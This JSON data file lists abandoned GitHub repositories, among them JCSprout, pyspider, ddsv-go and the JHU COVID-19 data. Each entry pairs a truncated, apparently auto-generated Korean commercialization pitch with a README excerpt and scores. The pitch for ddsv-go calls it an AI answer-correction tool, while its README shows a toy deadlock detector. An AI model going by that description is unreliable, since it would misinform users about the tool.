{"total":6062,"repos":[{"name":"crossoverJie/JCSprout","github_url":"https://github.com/crossoverJie/JCSprout","stars":6,"language":"Java","license":"MIT","abandonment_months":24,"description":"# JCSprout 저장소 분석\n\n## 왜 보물인가\n프로그래밍 학습자들을 위해 핵심 개념들을 정리한 교육용 자료 모음으로, 복잡한 기술을 쉽게 이해할 수 있도록 구성되어 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 온라인 코딩 교육 플랫폼**: 초보자 대상 프로그래밍 강좌 콘텐츠로 제공하여 구독 수익화\n**2. 기업 신입 교육 시스템**: 내부 개발팀 온","readme_excerpt":"\n<div align=\"center\">  \n\n<img src=\"https://s2.loli.net/2024/05/17/D8brxzCPh5vpOFk.png\" width=\"\"/> \n<br/>\n\n[![Build Status](https://travis-ci.org/crossoverJie/JCSprout.svg?branch=master)](https://travis-ci.org/crossoverJie/JCSprout)\n[![QQ群](https://img.shields.io/badge/QQ%E7%BE%A4-787381170-yellowgreen.svg)](https://jq.qq.com/?_wv=1027&k=5HPYvQk)\n\n[qq0groupsvg]: https://img.shields.io/badge/QQ%E7%BE%A4-787381170-yellowgreen.svg\n[qq0group]: https://jq.qq.com/?_wv=1027&k=5HPYvQk\n\n</div><br>\n\n\n> `Java Core Sprout`：处于萌芽阶段的 Java 核心知识库。\n\n**访问这里获取更好的阅读体验**：[https://crossoverjie.top/JCSprout/](https://crossoverjie.top/JCSprout/)\n\n<br/>\n\n<div align=\"center\">  \n\n<a href=\"https://t.zsxq.com/odQDJ\" target=\"_blank\"><img src=\"https://s2.loli.net/2024/05/17/zRkabDu2SKfChLX.png\" alt=\"202405171520366.png\"></a>\n</div>\n\n最近开通了知识星球，感谢大家对 `JCSprout` 的支持，为大家提供 100 份 10 元优惠券，也就是 69-10=59 元，具体福利大家可以扫码参考再决定是否加入。\n\n> PS: 后续会继续维护该项目，同时加入现在热门的 Golang/kubernetes/OpenTelemetry 等知识点，感兴趣的可以加入星球当面催更（当然内容也会更新到这个项目里）。\n\n\n| ","composite_score":0.778,"license_safety_tag":"safe"},{"name":"hyb1996/Auto.js","github_url":"https://github.com/hyb1996/Auto.js","stars":11,"language":"","license":"unknown","abandonment_months":40,"description":"# Auto.js 저장소 분석\n\n## 왜 보물인가\n스마트폰에서 반복적인 작업을 자동으로 처리해주는 기술로, 수동 작업에 시간을 낭비하는 사람들의 생산성을 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트폰 작업 자동화 플랫폼 (SNS 자동 발송, 데이터 수집 등)\n2. **내부 업무 도구**: 기업의 모바일 기기","readme_excerpt":"# Auto.js\n\n[README in English](https://github.com/hyb1996/Auto.js/blob/master/README-en.md)\n\n# 简介\n\nAuto.js (Pro)是Android上基于JavaScript的面向编程学习与效率提升的代码开发平台。\n\n## 软件下载\n\n官网: https://pro.autojs.org\n\n官方文档: https://pro.autojs.org/docs\n\n官方博客: https://blog.autojs.org\n\n## 开源说明\n\n本仓库为Auto.js 4.1的开源代码，从Auto.js Pro开始不再开源。\n\n为了避免之前的开源代码继续传播，现删除本仓库所有源代码。\n\n## License\n基于[Mozilla Public License Version 2.0](https://github.com/hyb1996/NoRootScriptDroid/blob/master/LICENSE.md)并附加以下条款：\n* **非商业性使用** — 不得将此项目及其衍生的项目的源代码和二进制产品用于任何商业和盈利用途\n","composite_score":0.7695,"license_safety_tag":"unknown"},{"name":"binux/pyspider","github_url":"https://github.com/binux/pyspider","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":25,"description":"# pyspider 저장소 분석\n\n## 왜 보물인가\n인터넷의 수많은 웹사이트에서 자동으로 정보를 수집하는 '웹 크롤링' 도구로, 누구나 복잡한 코딩 없이 대량의 데이터를 효율적으로 모을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **가격 비교 SaaS**: 전자상거래 사이트들의 상품 가격을 자동으로 수집하여 고객에게 최저가 정보를 제공하는 구독 서비스","readme_excerpt":"pyspider [![Build Status]][Travis CI] [![Coverage Status]][Coverage]\n========\n\nA Powerful Spider(Web Crawler) System in Python.\n\n- Write script in Python\n- Powerful WebUI with script editor, task monitor, project manager and result viewer\n- [MySQL](https://www.mysql.com/), [MongoDB](https://www.mongodb.org/), [Redis](http://redis.io/), [SQLite](https://www.sqlite.org/), [Elasticsearch](https://www.elastic.co/products/elasticsearch); [PostgreSQL](http://www.postgresql.org/) with [SQLAlchemy](http://www.sqlalchemy.org/) as database backend\n- [RabbitMQ](http://www.rabbitmq.com/), [Redis](http://redis.io/) and [Kombu](http://kombu.readthedocs.org/) as message queue\n- Task priority, retry, periodical, recrawl by age, etc...\n- Distributed architecture, Crawl Javascript pages, Python 2.{6,7}, 3.{3,4,5,6} support, etc...\n\nTutorial: [http://docs.pyspider.org/en/latest/tutorial/](http://docs.pyspider.org/en/latest/tutorial/)  \nDocumentation: [http://docs.pyspider.org/](http://docs.pyspider.org/)","composite_score":0.7271,"license_safety_tag":"safe"},{"name":"experiencor/basic-yolo-keras","github_url":"https://github.com/experiencor/basic-yolo-keras","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":39,"description":"# experiencor/basic-yolo-keras 가치 평가\n\n## 왜 보물인가\n사진이나 영상에서 사물을 자동으로 인식하는 기술을 누구나 쉽게 만들 수 있도록 만든 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 CCTV 서비스**: 침입자나 이상 상황을 자동으로 감지하는 구독형 영상 감시 서비스\n2. **제조업 품질검사 도구**: 공장 생산","readme_excerpt":"# YOLOv2 in Keras and Applications\n\nThis repo contains the implementation of YOLOv2 in Keras with Tensorflow backend. It supports training YOLOv2 network with various backends such as MobileNet and InceptionV3. Links to demo applications are shown below. Check out https://experiencor.github.io/yolo_demo/demo.html for a Raccoon Detector demo run entirely in brower with DeepLearn.js and MobileNet backend (it somehow breaks in Window). Source code of this demo is located at https://git.io/vF7vG.\n\n## Todo list:\n- [x] Warmup training\n- [x] Raccoon detection, Self-driving car, and Kangaroo detection\n- [x] SqueezeNet, MobileNet, InceptionV3, and ResNet50 backends\n- [x] Support python 2.7 and 3.6\n- [ ] Multiple-GPU training\n- [ ] Multiscale training\n- [ ] mAP Evaluation\n\n## Some example applications (click for videos):\n\n### Raccon detection\n<a href=\"https://www.youtube.com/watch?v=aibuvj2-zxA\" rel=\"some text\"><p align=\"center\"><img src=\"https://i.imgur.com/6okeDjz.jpg\" height=\"300\"></p></a>\n\nD","composite_score":0.7239,"license_safety_tag":"safe"},{"name":"y-taka-23/ddsv-go","github_url":"https://github.com/y-taka-23/ddsv-go","stars":6,"language":"Go","license":"Apache-2.0","abandonment_months":74,"description":"# y-taka-23/ddsv-go 상용화 분석\n\n## 왜 보물인가\nAI 시스템이 잘못된 답변을 생성할 때 이를 자동으로 감지하고 수정하는 기술로, 신뢰할 수 없는 AI를 실무에서 안전하게 사용할 수 있게 만든다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 챗봇 서비스**: 금융사나 은행의 자동 상담 시스템에 내장하여 잘못된 정보 제공을 방지\n2. **","readme_excerpt":"Toy Deadlock Detector\n=====================\n\n[![GoDoc](https://godoc.org/github.com/y-taka-23/ddsv-go/deadlock?status.svg)](https://godoc.org/github.com/y-taka-23/ddsv-go/deadlock)\n[![CircleCI](https://circleci.com/gh/y-taka-23/ddsv-go.svg?style=svg)](https://circleci.com/gh/y-taka-23/ddsv-go)\n\nThis package aims to provide a DSL to represent processes as [finite state machines](https://en.wikipedia.org/wiki/Finite-state_machine) and their concurrent composition. A detector traverses all possible states of the concurrent system, and reports on deadlocks, namely states in which no process can take the next step. Also, the package provides [Graphviz](https://www.graphviz.org/) style outputs, so you can intuitively view the state space of your system.\n\n\nExample: Dining Philosophers Problem\n------------------------------------\n\nThe [dining philosophers problem](https://en.wikipedia.org/wiki/Dining_philosophers_problem) is one of the best-known examples of concurrent programming. In this mod","composite_score":0.7145,"license_safety_tag":"safe"},{"name":"brightmart/text_classification","github_url":"https://github.com/brightmart/text_classification","stars":8,"language":"Python","license":"MIT","abandonment_months":32,"description":"# brightmart/text_classification 분석\n\n## 왜 보물인가\n글을 자동으로 분류해주는 AI 기술로, 수많은 텍스트 데이터를 빠르게 정리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 이메일 자동 분류, 고객 피드백 카테고리화 서비스\n- **내부 업무 도구**: 기업의 문서 관리, 뉴스레터 자동 태깅 시스템\n-","readme_excerpt":"Text Classification\n-------------------------------------------------------------------------\nThe purpose of this repository is to explore text classification methods in NLP with deep learning.\n\n#### Update: \n\nCustomize an NLP API in three minutes, for free: <a href='https://www.cluebenchmarks.com/clueai.html'>NLP API Demo</a>\n\nLanguage Understanding Evaluation benchmark for Chinese(<a href='https://www.CLUEbenchmarks.com'>CLUE benchmark<a/>): run 10 tasks & 9 baselines with one line of code, performance comparision with details.\n\nReleasing Pre-trained Model of <a href=\"https://github.com/brightmart/albert_zh\">ALBERT_Chinese</a> Training with 30G+ Raw Chinese Corpus, xxlarge, xlarge and more, Target to match State of the Art performance in Chinese, 2019-Oct-7, During the National Day of China!\n \n<a href='https://github.com/brightmart/nlp_chinese_corpus'>Large Amount of Chinese Corpus for NLP Available!</a>\n\nGoogle's BERT achieved new state of art result on more than 10 tasks in NLP usi","composite_score":0.7132,"license_safety_tag":"safe"},{"name":"ykfe/imove","github_url":"https://github.com/ykfe/imove","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":51,"description":"# iMove 프로젝트 분석 보고서\n\n## 왜 보물인가\n복잡한 작업 흐름을 시각적으로 설계하고 자동 실행할 수 있는 도구로, 전문가 없이도 업무 자동화가 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 반복적인 업무(데이터 입력, 이메일 발송, 보고서 생성)를 자동화하는 웹 서비스\n- **내부 업무 도구**: 대규모 기업의 HR/","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://ss1.bdstatic.com/70cFuXSh_Q1YnxGkpoWK1HF6hhy/it/u=3874775950,1064987171&fm=26&gp=0.jpg\" width=\"200px\">\n  \n  [![gitter][gitter-image]][gitter-url]\n  [![NPM version][npm-image]][npm-url]\n  [![build status][travis-image]][travis-url]\n  [![Test coverage][coveralls-image]][coveralls-url]\n  [![PR's Welcome][pr-welcoming-image]][pr-welcoming-url]\n\n</div>\n\n<p align=\"center\">\n  INACTIVE: iMove 是一个逻辑可复用的，面向函数的，流程可视化的 JavaScript 工具库。\n</p>\n\n[English](./README.en-US.md) | 简体中文\n\niMove是一个面向前端开发者的逻辑编排工具，核心解决的是复杂逻辑复用的问题。\n\niMove由2部分组成：画布和imove-sdk。通过本地起一个http服务运行画布，在画布上完成代码编写和节点编排，最终将流程导出dsl，放到项目中，通过imove-sdk调用执行。\n\n## 特性\n\n- [x] **流程可视化**：上手简单，绘图方便，逻辑表达更直观，易于理解\n- [x] **逻辑复用**：iMove 节点支持复用，单节点支持参数配置\n- [x] **灵活可扩展**：仅需写一个函数，节点可扩展，支持插件集成\n- [x] **适用于JavaScript所有场景**：比如前端点击事件，Ajax 请求和 Node.js 后端 API等\n- [ ] **多语言编译**：无语言编译出码限制（例：支持 JavaScript, Java 编译出码）\n\n## 使用场景\n\n![usage](https://img.alicdn.com/imgextra/i1/O1CN01kRXnfQ1LFhesOA6cn_!!6000000001270-2-tps-2212-1166.png)\n\n1","composite_score":0.7066,"license_safety_tag":"safe"},{"name":"stevemao/github-issue-templates","github_url":"https://github.com/stevemao/github-issue-templates","stars":5,"language":"","license":"NOASSERTION","abandonment_months":27,"description":"# GitHub Issue Templates 분석 보고서\n\n## 왜 보물인가\n회사나 팀에서 버그 신고나 기능 요청을 받을 때 형식을 통일해서 정보를 빠짐없이 받을 수 있는 템플릿 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 지원팀이 버그 리포트를 체계적으로 수집하는 고객 피드백 관리 플랫폼\n2. **내부 업무 도구**: 개발팀","readme_excerpt":"## A collection of GitHub issue and pull request templates\n\n*Update*: GitHub now also supports [multiple issue templates](https://help.github.com/articles/about-issue-and-pull-request-templates/).\n\n~~GitHub finally supports [issue template](https://github.com/blog/2111-issue-and-pull-request-templates).~~\n\n# What is an issue template?\n\n[Issue and Pull Request templates](https://blog.github.com/2016-02-17-issue-and-pull-request-templates/)\n\n# How to create issue templates?\n\n- [About issue and pull request templates](https://help.github.com/en/github/building-a-strong-community/about-issue-and-pull-request-templates)\n- ~~[Manually creating a single issue template for your repository](https://help.github.com/articles/manually-creating-a-single-issue-template-for-your-repository/)~~\n\n# 10+ templates for you to pick!\n\nFind your issue/PR templates, and just grab and go.\n\n*Inspired by excellent GitHub projects that use issue and pull request templates.*\n\nTemplates here are either copied from ","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"KFERMercer/OpenWrt-CI","github_url":"https://github.com/KFERMercer/OpenWrt-CI","stars":5,"language":"","license":"MIT","abandonment_months":38,"description":"# OpenWrt-CI 프로젝트 평가\n\n## 왜 보물인가\nOpenWrt(공유기 운영체제) 개발을 자동화하는 도구로, 공유기를 커스텀하고 싶은 사람들의 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: ISP(인터넷 회사)나 네트워크 장비 제조사가 자동으로 공유기 펌웨어를 빌드하고 배포하는 시스템\n2. **Saa","readme_excerpt":"[English](README-en.md) ←\n\n# 借助 GitHub Actions 的 OpenWrt 在线集成自动编译.\n\n## [![Build](https://img.shields.io/github/workflow/status/KFERMercer/OpenWrt/OpenWrt-CI/master?)](https://github.com/KFERMercer/OpenWrt/actions?query=workflow%3AOpenWrt-CI) [![Release](https://img.shields.io/github/release/KFERMercer/OpenWrt-CI?color=blue)](https://github.com/KFERMercer/OpenWrt-CI/releases)\n\n支持自动定制固件, 自动调整依赖及生成配置文件, 无需上传配置. 兼容 [coolsnowwolf/lede](https://github.com/coolsnowwolf/lede) 以及 OpenWrt trunk.\n\n同时支持自动合并推送上游提交 (也就是自动更新), 直接把`merge-upstream.yml`放入`.github/workflows/`即可 (默认上游为 coolsnowwolf/lede, 高级玩家请自行改写).\n\n感谢[P3TERX](https://github.com/P3TERX/Actions-OpenWrt)珠玉在前.\n\n## 使用教程:\n\n### 在一切开始前, 你需要的是:\n\n- GitHub 账号\n- 申请使用 GitHub Actions\n- [基本的Git技能](https://www.liaoxuefeng.com/wiki/896043488029600)\n- 自己的OpenWrt分支 ([Lean源](https://github.com/coolsnowwolf/lede)或者[官方源](https://github.com/openwrt/openwrt/))\n- 脑子\n\n### 相关文章: 作者-糖炒栗子 \n\n- [面向小白的Github_Action使用workflow自动编译lean_openwrt教程](https://zhuanlan.zhihu.c","composite_score":0.7,"license_safety_tag":"safe"},{"name":"flutter/plugins","github_url":"https://github.com/flutter/plugins","stars":7,"language":"Dart","license":"bsd-3-clause","abandonment_months":40,"description":"# flutter/plugins 평가 보고서\n\n## 왜 보물인가\n스마트폰 앱을 만드는 데 필수적인 기능들(카메라, 위치정보, 결제 등)을 쉽게 추가할 수 있는 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **배달 앱 개발 회사**: 지도, 위치추적, 결제 플러그인을 조합하여 배달앱 기능 구현\n2. **사진 공유 SNS 서비스**: 카메라, 갤러리, 클","readme_excerpt":"# Flutter plugins\n\n| **ARCHIVED** |\n|--------------|\n| This repository is no longer in use; all source has moved to [flutter/packages](https://github.com/flutter/packages) and future development work will be done there. |\n\n## ARCHIVED CONTENT\n\nThis repo is a companion repo to the main [flutter\nrepo](https://github.com/flutter/flutter). It contains the source code for\nFlutter first-party plugins (i.e., plugins developed by the core Flutter team).\nCheck the `packages` directory for all plugins.\n\nFlutter plugins enable access to platform-specific APIs. For more information\nabout plugins, and how to use them, see\n[https://flutter.dev/platform-plugins/](https://flutter.dev/platform-plugins/).\n\nThese plugins are also available on\n[pub](https://pub.dev/flutter/packages).\n\n## Issues\n\nPlease file any issues, bugs, or feature requests in the [main flutter\nrepo](https://github.com/flutter/flutter/issues/new).\n\nIssues pertaining to this repository are [labeled\n\"plugin\"](https://github.com/flutter/","composite_score":0.7,"license_safety_tag":"safe"},{"name":"atralice/Curso.Prep.Henry","github_url":"https://github.com/atralice/Curso.Prep.Henry","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"# atralice/Curso.Prep.Henry 상품화 분석\n\n## 왜 보물인가\nHenry 부트캠프 준비생들을 위한 실전 코딩 학습 자료로, 프로그래밍 입문자의 진입장벽을 낮추고 취업 준비를 돕는 체계적인 커리큘럼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독식 온라인 코딩 학습 플랫폼으로 강의 영상, 실습 문제, 진도 추적 기","readme_excerpt":"<img  src='./logo.png' height='70px'>\n\n## Introducción\n\n# Modulo 0 - Prep\n\n* [00 - Primeros Pasos](./00-PrimerosPasos)\n* [01 - Git](./01-Git)\n* [02 - I - Introducción a Javascript: Variables, tipos de datos y funciones](./02-JS-I)\n* [03 - II- Flujos de control, operadores de comparación, bucles for](./03-JS-II)\n* [04 - III - continuación de bucles for y Arrays](./04-JS-III)\n* [05 - IV - Objetos](./05-JS-IV)\n* [06 - V - Clases y prototype](./06-JS-V)\n* [07 - VI - Callbacks](./07-JS-VI)\n* [08 - HTML](./08-HTML)\n* [09 - CSS](./09-CSS-Positioning)\n* Henry Challenge => [Inscribite acá para rendir](https://challenge.prep.soyhenry.com/)\n\n## Conceptos:\n\n* [Expressions vs Statements](./JS-conceptos/Statements-Expressions/)\n\n## Clases de Repaso (Henry Heroes)\n\nEstudiantes mas avanzados de la carrera resuelven los ejercicios en vivo en formato webinar.\n[Acá podes](https://docs.google.com/spreadsheets/d/e/2PACX-1vQwV-pEgWuxqI1B3pdVI0lbeqPB0a6LHPk6-DQlifDdX9Rue_Ul4YTOxoOg-hhofv6U0f32OoXOU2Wf/pubhtm","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"ansible/ansible-examples","github_url":"https://github.com/ansible/ansible-examples","stars":5,"language":"Shell","license":"unknown","abandonment_months":25,"description":"# ansible/ansible-examples 분석\n\n## 왜 보물인가\n서버를 자동으로 설정하고 관리할 수 있는 실제 활용 예제들을 모아놓은 저장소로, 복잡한 IT 운영 작업을 간단하게 자동화하는 방법을 배울 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 자동 배포 서비스**: 기업이 구독하면 자동으로 서버를 설정해주고 관리해주는 SaaS로","readme_excerpt":"\nAnsible Examples\n----------------\n\nThis repository contains examples and best practices for building Ansible Playbooks.\n\n","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"LingCoder/OnJava8","github_url":"https://github.com/LingCoder/OnJava8","stars":6,"language":"","license":"MIT","abandonment_months":44,"description":"# OnJava8 저장소 분석\n\n## 왜 보물인가\nJava 프로그래밍 언어의 최신 버전(8 이상)을 배우고 싶은 모든 사람을 위한 무료 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 유료 Java 강좌를 제작하는 회사가 이 자료를 기반으로 체계화된 강의 콘텐츠로 재구성하여 판매\n2. **기업 직원 교육 도구**: 대기업","readme_excerpt":"# 《On Java 8》中文版\n\n## 最新动态\n\n《ON JAVA 中文版》终于上市了！推荐大家去京东购买：https://u.jd.com/ZwXIEMn ，新书首发，价格也比较美丽。\n\n值得一提的是，为了与时俱进，作者也增补Java 11、Java17的相关内容，很多内容都非常贴合实际的开发场景，知识点非常细致，可以说覆盖了市面其他Java书90%的内容。\n\n随书配套视频也很精良！4位行业内的顶级大佬为这本书录制了配套教程，尤其是对初学者十分友好，重点知识都帮你划出来了。\n\n——————————————\n\n图灵要出On Java 8的中文版了！ 非常感谢大家长久以来对本项目的支持和贡献，出于对原作者的敬意和对版权尊重，本项目将于2021年2月26日起闭源。 之后，我将作为On Java 8的特邀审读嘉宾，继续贡献自己的一份力量！\n\n想要继续关注本书出版进度，请访问图灵社区：https://www.ituring.com.cn/book/2935\n\n\n## 一起交流\n\n点击链接加入群聊【Java技术流群】247457782 <a target=\"_blank\" href=\"https://jq.qq.com/?_wv=1027&k=gI8ST3tt\"><img border=\"0\" src=\"https://raw.githubusercontent.com/LingCoder/OnJava8/master/docs/images/qqgroup.png\" alt=\"Java技术交流\" title=\"Java技术交流\"></a>( 点击图标即可加入 )<br> 加群时请简单备注下来源或说明\n\n<div align=\"left\">\n<img src=\"https://raw.githubusercontent.com/LingCoder/OnJava8/master/assets/QQGroupQRCode.jpg\"  alt=\"QQGroupQRCode\"/>\n </div>\n \n\n## 联系方式\n\n- E-mail : <lingcoder@gmail.com>\n","composite_score":0.7,"license_safety_tag":"safe"},{"name":"CSSEGISandData/COVID-19","github_url":"https://github.com/CSSEGISandData/COVID-19","stars":5,"language":"","license":"unknown","abandonment_months":36,"description":"# COVID-19 데이터 저장소 분석\n\n## 왜 보물인가\n전 세계 COVID-19 확진자, 사망자, 회복자 데이터를 한곳에서 관리하는 신뢰할 수 있는 공식 정보원이 됨으로써 수많은 뉴스, 앱, 연구기관이 의존하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **대시보드 SaaS**: 기업이나 정부기관이 구독하여 실시간 COVID-19 현황을 모니터링하는 웹","readme_excerpt":"# COVID-19 Data Repository by the Center for Systems Science and Engineering (CSSE) at Johns Hopkins University\n\nOn March 10, 2023, the Johns Hopkins Coronavirus Resource Center ceased its collecting and reporting of global COVID-19 data. For updated cases, deaths, and vaccine data please visit the following sources:\n- Global: [World Health Organization (WHO)](https://www.who.int/)\n- U.S.: [U.S. Centers for Disease Control and Prevention (CDC)](https://www.cdc.gov/coronavirus/2019-ncov/index.html)\n\nFor more information, visit the [Johns Hopkins Coronavirus Resource Center](https://coronavirus.jhu.edu/).\n\n----\nThis is the data repository for the 2019 Novel Coronavirus Visual Dashboard operated by the Johns Hopkins University Center for Systems Science and Engineering (JHU CSSE). Also, Supported by ESRI Living Atlas Team and the Johns Hopkins University Applied Physics Lab (JHU APL).\n\n\n\n<b>Visual Dashboard (desktop):</b>\nhttps://www.arcgis.com/apps/opsdashboard/index.html#/bda7594740fd40","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"YunaiV/SpringBoot-Labs","github_url":"https://github.com/YunaiV/SpringBoot-Labs","stars":11,"language":"Java","license":"unknown","abandonment_months":25,"description":"# SpringBoot-Labs 상업화 분석\n\n## 왜 보물인가\n자바 프로그래밍의 핵심 기술(Spring Boot)을 배우고 연습할 수 있는 실전 교재이자, 이를 상품화하면 프로그래머 교육 시장에서 수익을 만들 수 있다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 동영상 강의 + 실습 코드 제공 플랫폼으로 월 구독료 수익화\n2. **기업","readme_excerpt":"> 友情提示：因为提供了 50000+ 行示例代码，所以艿艿默认注释了所有 Maven Module。\n>\n> 胖友可以根据自己的需要，修改 [`pom.xml`](https://github.com/YunaiV/SpringBoot-Labs/blob/master/pom.xml) 即可。\n\n一个涵盖六个主流技术栈的**正经**仓库：\n* [《Spring Boot 专栏》](https://github.com/YunaiV/SpringBoot-Labs#spring-boot-%E4%B8%93%E6%A0%8F)\n* [《Spring Cloud Alibaba 专栏》](https://github.com/YunaiV/SpringBoot-Labs#spring-cloud-alibaba-%E4%B8%93%E6%A0%8F)\n* [《Spring Cloud 专栏》](https://github.com/YunaiV/SpringBoot-Labs#spring-cloud-%E4%B8%93%E6%A0%8F)\n* [《Dubbo 专栏》](https://github.com/YunaiV/SpringBoot-Labs#Dubbo-%E4%B8%93%E6%A0%8F)\n* [《消息队列 MQ 专栏》](https://github.com/YunaiV/SpringBoot-Labs#%E6%B6%88%E6%81%AF%E9%98%9F%E5%88%97-mq-%E4%B8%93%E6%A0%8F)\n* [《分布式事务专栏》](https://github.com/YunaiV/SpringBoot-Labs#分布式事务专栏)\n\n作为一个热爱**深夜**撸码的 18 岁头发茂密的可爱小男孩，希望大佬能够**一键三连**。\n\n![一间三连](http://static.iocoder.cn/github-star.jpg)\n\n> **亲，一键三连啊**\n\n# 交流群\n\n扫码如下**二维码**，回复「艿艿」关键字。\n\n可以添加 18 岁的我为好友，并拉你进一个~~交流~~**装逼群**。\n\n![骚气的二维码](http://www.iocoder.cn/images/common/erweima.jpg)\n\n😈 等后面，艿艿**头发","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"Python-World/python-mini-projects","github_url":"https://github.com/Python-World/python-mini-projects","stars":17,"language":"Python","license":"MIT","abandonment_months":47,"description":"# Python-World/python-mini-projects 평가\n\n## 왜 보물인가\n프로그래밍을 배우려는 초보자들이 실제로 동작하는 작은 프로젝트들을 직접 따라 만들면서 배울 수 있는 교육용 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 이 프로젝트들을 학습 교재로 활용하여 초보자 대상 구독형 강의 서비스 제공\n2. *","readme_excerpt":"<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\r\n[![forthebadge](https://forthebadge.com/images/badges/built-by-developers.svg)](https://forthebadge.com)\r\n[![forthebadge](https://forthebadge.com/images/badges/built-with-love.svg)](https://forthebadge.com)\r\n[![forthebadge](https://forthebadge.com/images/badges/built-with-swag.svg)](https://forthebadge.com)\r\n[![forthebadge](https://forthebadge.com/images/badges/made-with-python.svg)](https://forthebadge.com)\r\n\r\n# Python-Mini-Projects\r\n\r\n[![All Contributors](https://img.shields.io/github/contributors/Python-World/python-mini-projects)](#contributors-)\r\n![Issues](https://img.shields.io/github/issues/Python-World/python-mini-projects)\r\n![Pull Requests](https://img.shields.io/github/issues-pr/Python-World/python-mini-projects?)\r\n![Forks](https://img.shields.io/github/forks/Python-World/python-mini-projects)\r\n![Stars](https://img.shields.io/github/stars/Python-World/python-mini-projects)\r\n![License](https://img.sh","composite_score":0.7,"license_safety_tag":"safe"},{"name":"google/iosched","github_url":"https://github.com/google/iosched","stars":10,"language":"Kotlin","license":"apache-2.0","abandonment_months":41,"description":"# google/iosched 상용화 분석\n\n## 왜 보물인가\nGoogle이 공식 개발한 대규모 행사 일정 관리 앱으로, 수천 명의 참가자를 효율적으로 관리할 수 있는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **학회/컨퍼런스 관리 SaaS**: 학술대회, 산업 컨퍼런스 주최자를 위한 참가자 일정 관리 플랫폼\n2. **대규모 행사 운영 도구**","readme_excerpt":"Google I/O Android App (ARCHIVED)\n======================\n\n## 2023 Update\n\n**This repository has been archived.** The Google I/O app has guided online and in-person visitors through the Google I/O conference for 10 years since 2009. It has also helped thousands of developers as an open-source sample. \n\nTo follow Modern Android Development best practices, check out the [Now in Android](https://github.com/android/nowinandroid) repository, which replaces iosched as our real-world sample. \n\n## 2021 Update\n\n**Due to global events, Google I/O 2020 was canceled and Google I/O 2021 is an online-only event, so\nthe companion app hasn't been updated since 2019. However, the `iosched` team has continued\nadding several architecture improvements to its codebase.\nThe general look and feel of the app is unchanged, and the app\nstill uses the data from Google I/O 2019.**\n\nMajor improvements implemented in 2021:\n* Migration from LiveData to Kotlin Flows to observe data.\n* Support for large screens and oth","composite_score":0.7,"license_safety_tag":"safe"},{"name":"microsoftarchive/redis","github_url":"https://github.com/microsoftarchive/redis","stars":8,"language":"C","license":"NOASSERTION","abandonment_months":83,"description":"# Redis 저장소 분석\n\n## 왜 보물인가\n마이크로소프트가 공식 보관 중인 Redis는 데이터를 매우 빠르게 저장·불러오는 기술로, 전 세계 수백만 개 서비스의 성능을 뒷받침하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소셜 미디어 앱의 실시간 알림·메시지 캐싱으로 응답속도를 밀리초 단위로 개선\n- **내부 업무 도구*","readme_excerpt":"[![Windows Status](http://img.shields.io/appveyor/ci/MSOpenTech-lab/redis.svg?style=flat-square)](https://ci.appveyor.com/project/MSOpenTech-lab/redis) [![NuGet version](http://img.shields.io/nuget/v/redis-64.svg?style=flat-square)](http://www.nuget.org/packages/redis-64/) [![Chocolatey version](http://img.shields.io/chocolatey/v/redis-64.svg?style=flat-square)](http://www.chocolatey.org/packages/redis-64/) [![Chocolatey downloads](http://img.shields.io/chocolatey/dt/redis-64.svg?style=flat-square)](http://www.chocolatey.org/packages/redis-64/)\n\nThis project is no longer being actively maintained. If you are looking for a Windows version of Redis, you may want to check out [Memurai](https://www.memurai.com/). Please note that Microsoft is not officially endorsing this product in any way.\n\n## Redis on Windows \n\n- This is a port for Windows based on [Redis](https://github.com/antirez/redis).\n- We officially support the 64-bit version only. Although you can build the 32-bit version from s","composite_score":0.7,"license_safety_tag":"unknown"},{"name":"MorvanZhou/tutorials","github_url":"https://github.com/MorvanZhou/tutorials","stars":9,"language":"Python","license":"MIT","abandonment_months":66,"description":"# MorvanZhou/tutorials 분석\n\n## 왜 보물인가\n프로그래밍 초보자들이 단계별로 배울 수 있는 체계적인 학습 자료 모음으로, 누구나 무료로 접근 가능한 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 강좌 구독 서비스로 체계화된 커리큘럼과 함께 판매\n2. **기업 직원 교육 도구**: 회사 내 신입","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://mofanpy.com/tutorials/\" target=\"_blank\">\n    <img width=\"60%\" src=\"%E7%89%87%E5%A4%B4.png\" style=\"max-width:100%;\">\n    </a>\n</p>\n\n\n<br>\n\n我是 周沫凡, [莫烦Python](https://mofanpy.com/) 只是谐音, 我喜欢制作,\n分享所学的东西, 所以你能在这里找到很多有用的东西, 少走弯路. 你能在[这里](https://mofanpy.com/about/)找到关于我的所有东西.\n\n## 这个 Python tutorial 